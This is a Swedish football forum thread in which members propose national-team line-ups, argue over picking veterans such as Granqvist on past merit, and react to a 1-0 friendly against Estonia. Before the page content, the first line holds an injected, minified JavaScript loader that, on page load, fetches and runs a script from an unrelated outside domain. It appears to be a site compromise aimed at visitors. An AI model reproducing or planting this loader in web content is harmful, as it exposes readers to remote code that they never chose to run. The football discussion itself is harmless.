;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Svenska landslaget – Fotboll – FMSweden Forum
Meny Stäng

Svenska landslaget
 
Share:
Notifications
Clear all

Svenska landslaget

12 Inlägg
6 Users
20 Reactions
894 Visningar
Daniel Nilsson
(@daniel-nilsson)
Noble Member Admin
Blev medlem: 4 år sedan
Inlägg: 498
Topic starter  

Vi behöver en sån här tråd, speciellt när Zlatan är tillbaka.

1. Om du hade fått ta ut den startelva du anser vara bäst, hur hade den sett ut?
2. Är det rätt att ta ut spelare på grund av gamla meriter (Ex. Granen) före nuvarande form?

Jag har varit emot Zlatan i landslaget sedan han slutade och var väldigt skeptisk fram tills matcherna. Det är en helt annan Zlatan vi ser nu och jag verkligen ÄLSKAR honom. Han passar perfekt in i landslaget nu. Han behöver inte ha ALLA bollar och behöver inte göra ALLA mål heller, om ens något. Så länge LAGET vinner så verkar han vara nöjd numera.

1. Min startelva hade varit följande: Nordfeldt - Lustig/Lindelöf/Kina-Mackan/Augustinsson - Forsberg/Ekdahl/Olsson/Claesson - Zlatan/Isak.
2. Jag tycker inte att Granen skulle följt med som spelare men tycker absolut att han hade kunnat följa med som ledare.


   
Micke reacted
Citera
raca14
(@raca14)
Reputable Member
Blev medlem: 4 år sedan
Inlägg: 225
 

Jaha, då passar jag på att lägga in vad jag tycker.

1. Om alla är friska och hela: Olsen; Lustig, VNL, Jansson, Augustinsson; Kulusevski, Ekdal, Olsson, Forsberg; Zlatan, Isak

Hade gärna tagit med Claesson, så om jag skulle kört på en trebackslinje hade det sett ut så här istället:

Olsen; Lustig, Jansson, Augustinsson; Ekdal, Olsson; Kulusevski, Claesson, Forsberg; Zlatan, Isak.

 

2. Gamla meriter, nej, rutin, ja... Men tyvärr, Granen håller inte längre då andra gör det minst lika bra "där ute". VNL, Jansson, Helander och Jocke Nilsson är för mig de fyra givna mittbackarna... Sedan om man vill få det där go:et i laget och om Granen gör skillnad i omklädningsrummet, så ska han väl iaf kunna hänga med som ledare, precis som vår Super-Danne skriver. 🙂


   
SvaraCitera
friggan
(@friggan)
Estimable Member
Blev medlem: 4 år sedan
Inlägg: 180
 

Roligt med landslagstråd! Och kul med sex poäng på två matcher i kvalet!

För att svara på frågan om granen, så tog ju Janne ut fler än de 23 spelare som är max till ett kval. Han var därav ej med för att spela, utan för att träna/peppa/coacha/allt möjligt. Han har således inte tagit någon annans plats i laget och då tycker jag inte att det är några problem. 

 

Angående elvan så är det kul med så mycket konkurrens! 

Berg - Ibrahimovic
Forsberg - Ekdal - Olsson - Kulusevski
Augustinsson - Lindelöf - Helander - Lustig
Olsen 

Platsen bredvid Lindelöf är vidöppen. Helander, Jansson, Nilsson och Danielsson slåss om sista platsen! Lustig är för ensam på högertronen. Vem tar över? Cajuste? Krafth? nej jag vet inte. Men någon måste aspirera på platsen. Vi har haft noll konkurrens på högerbacksplatsen så länge jag kan minnas. Angående mittfältet så är det främst Claesson som jag vill få in. Men jag tar Forsberg och Kulusevski före. Svanberg är en riktigt bra spelare och står på tu som innermitt. Larsson också givetvis, bra vinnarskalle där! Jag har alltid gillat Berg. Ingen skapar så många chanser åt sig själv eller andra som Marcus. Igår spelade han 24 minuter och jag räknade till tre-fyra bra lägen som han löste, i stort sett, helt på egen hand. Därför tycker jag att han går före Isak och Quaison. Givetvis med en hårsmån! 


   
Micke reacted
SvaraCitera
Daniel Nilsson
(@daniel-nilsson)
Noble Member Admin
Blev medlem: 4 år sedan
Inlägg: 498
Topic starter  

Vilka är det nu som slutar efter EM? Berg, Larsson och Lustig? Finns det fler?


   
SvaraCitera
Yayakolo
(@yayakolo)
Medlem
Blev medlem: 4 år sedan
Inlägg: 126
 

Hmm, kul med mycket konkurrens!

Jag hade nog velat spela:
Olsen
Lustig Lindelöf Helander Augustinsson
Claesson Olsson Ekdal Forsberg
Kulusevski Zlatan

Jag tycker Claesson ska vara på planen då jag faktiskt anser att han ofta är en av våra bästa spelare när han är på plan. Sliter som fan defensivt och är kreativ framåt. Nu har han visserligen en tung skada i bagaget, men tittar vi tex mot Georgien är det ju hans fina prestation som ger oss tre poäng och backar vi tillbaka längre innan skadan så började han EM-kvalet med 3 mål och 1 assist på 3 matcher och hade ett VM med 3 ass på 5 matcher. Enligt mig är Claesson en garant för en stabil insats där spelare som Kulusevski, Forsberg och Isak fortfarande är rätt ojämna och för många ojämna spelare på banan samtidigt kan bli platt fall vissa matcher. Jag håller faktiskt Claesson högre än Forsberg i landslaget, tycker Claesson både står för mer poäng framåt, bättre defensivt jobb och högre lägstanivå.

Jag tror att om vi har Kulusevski och Zlatan som kan ta in bollen, ta den fysiska kampen och använda sin teknik så kommer Forsberg och Claesson kunna hitta ytor på ett bra sätt. Risken är att det blir för statiskt, samtidigt visade Kulusevski i Parma hur jäkla bra han kan vara när han får yta att trampa på. MEN jag kan också se att Isak bör spela för att få mer löpningar i djupled.

Men som sagt, jäkligt kul med konkurrens offensivt. Defensivt är det mycket mer sårbart. Tycker egentligen inte Lustig håller längre, han är stabil men inte särskilt mkt mer och gång på gång på sistone tappar han löpdueller. Dock har vi inget vettigt alternativ där. 


   
Micke and friggan reacted
SvaraCitera
(@bobbyorigi)
New Member
Blev medlem: 4 år sedan
Inlägg: 4
 

Det känns rätt svårt att ta ut en elva just nu, många frågetecken. Kan Olsson få igång formen borta i Ryssland? Om så inte är fallet och vi får se fler prestationer som i dom två VM-kval matcherna så måste vi nog nästan fundera på att spela in någon annan där 🙁 

Mittbacksplatsen jämte VNL känns väldigt öppen när Granqvist är skadad och Danielsson är fast i Kina. Tycker Helander gjorde det mer än godkänt i kvalmatcherna men ska bli spännande att se Starfelt och Nilsson om dom får kampera ihop mot Estland, vilket jag antar. Tycker Granqvist ska finnas med om han gör en okej vår i HIF, känns tryggt att ha med han då VNL och Helander fortfarande känns lite osäkert. Så lite gamla meriter tycker jag ändå man kan ta med i beräkningen.

Om jag skulle vara förbundskapten skulle jag nog köra på:

Olsen

Lustig-VNL-Helander-Augustinsson

Claesson-Ekdal-Olsson(?)-Forsberg

Berg-Isak

OBS: Nej jag är inte anti Zlatan, detta är tänkt för EM premiären mot Spanien och i sådana matcher ser jag mer Zlatan som en impactspelare från bänken då jag föredrar bra presspel från Berg. Mot sämre lag ser jag dock gärna Zlatan och Isak! 🙂

Känner att Claesson är viktig för balansen på laget och även en viktig poängspelare. Om Kulusevski ska spela så ser jag gärna honom i en friare roll jämte en anfallare där han får chansen att spela med en högre svårighetsgrad med mindre risk att åka på farliga kontringar. Lustig är väl med i brist på annat och Helander får chansen om inte Granqvist får koll på sin skada och form.

This post was modified 3 år sedan by BobbyOrigi

   
Micke reacted
SvaraCitera
Daniel Nilsson
(@daniel-nilsson)
Noble Member Admin
Blev medlem: 4 år sedan
Inlägg: 498
Topic starter  

Kvällens match mot Estland ställer Sverige upp enligt följande:

Karl-Johan Johnsson
Emil Krafth - Carl Starfelt - Joakim Nilsson - Pierre Bengtsson
Jesper Karlsson - Jens Cajuste - Mattias Svanberg - Ken Sema
Marcus Berg - Robin Quaison

 

Tycker det finns flera intressanta spelare där jag speciellt kommer följa Starfelt - Nilsson, Jesper Karlsson samt Cajuste - Svanberg. Hoppas verkligen att åtminstone en av mittbackarna samt Cajuste kan visa lite framfötter så vi har fler att välja på där. Speciellt om Ekdahl är lite skadedrabbad, vill verkligen inte ha Larsson i elvan!

 

Edit; jag var verkligen en dag för tidig. Helt övertygad om att de spelade ikväll. Blev förbannad när jag letade efter matchen.


   
raca14, Micke and friggan reacted
SvaraCitera
friggan
(@friggan)
Estimable Member
Blev medlem: 4 år sedan
Inlägg: 180
 

Jodå, denna elva ska nog köra över Estland, och det med råge. 4-1 kanske?


   
SvaraCitera
Micke
(@micke)
Reputable Member Admin
Blev medlem: 4 år sedan
Inlägg: 239
 

Ska bli roligt att få se lite andra spelare i kväll, särskilt Jesper Karlssons "riktiga" debut blir intressant ur ett Falkenbergsperspektiv. Tippar 3-0 till Sverige!

"I have never played for a draw in my life." - Sir Alex Ferguson


   
SvaraCitera
Daniel Nilsson
(@daniel-nilsson)
Noble Member Admin
Blev medlem: 4 år sedan
Inlägg: 498
Topic starter  

Jag tror 2-0!


   
SvaraCitera
Daniel Nilsson
(@daniel-nilsson)
Noble Member Admin
Blev medlem: 4 år sedan
Inlägg: 498
Topic starter  

1-0  och väldigt blandade känslor efter matchen.

Tycker det var en match som många behövde ta för sig för att ha chans på att komma med i EM-truppen, vissa tog den - andra inte. Cajuste och inbytte Kulusevski tyckte jag var friska fläktar. Berg - Quaison är givna bakom Zlatan - Isak.

I mina ögon tycker jag i nuläget att EM-truppen ska se ut så här:

Målvakter: Olsen/Nordfeldt/Johnsson
Backar: Lustig/Krafth - Lindelöf/Kina-Mackan/Jansson/Helander - Augustinsson/Bengtsson
Mittfältare: Forsberg/Claesson/Kulusevski/Larsson - Ekdahl/Olsson/Svanberg/Cajuste
Anfallare: Zlatan/Isak/Berg/Quaison

Vill gärna putta in Starfeldt samt Jordan Larsson eller Sema som jokrar.


   
SvaraCitera
Micke
(@micke)
Reputable Member Admin
Blev medlem: 4 år sedan
Inlägg: 239
 

@daniel-nilsson En helt okej match, släppte inte till så mycket bakåt (som sig bör mot Estland) men hade hoppats på lite mer kvalitet framåt. Angående truppen så tror jag på samma, bortsett från att Gustav Svensson går in istället för Cajuste. Känns som att Janne gillar trygga val, likt när han valde Rohden före Sema VM 2018.

"I have never played for a draw in my life." - Sir Alex Ferguson


   
SvaraCitera
Share: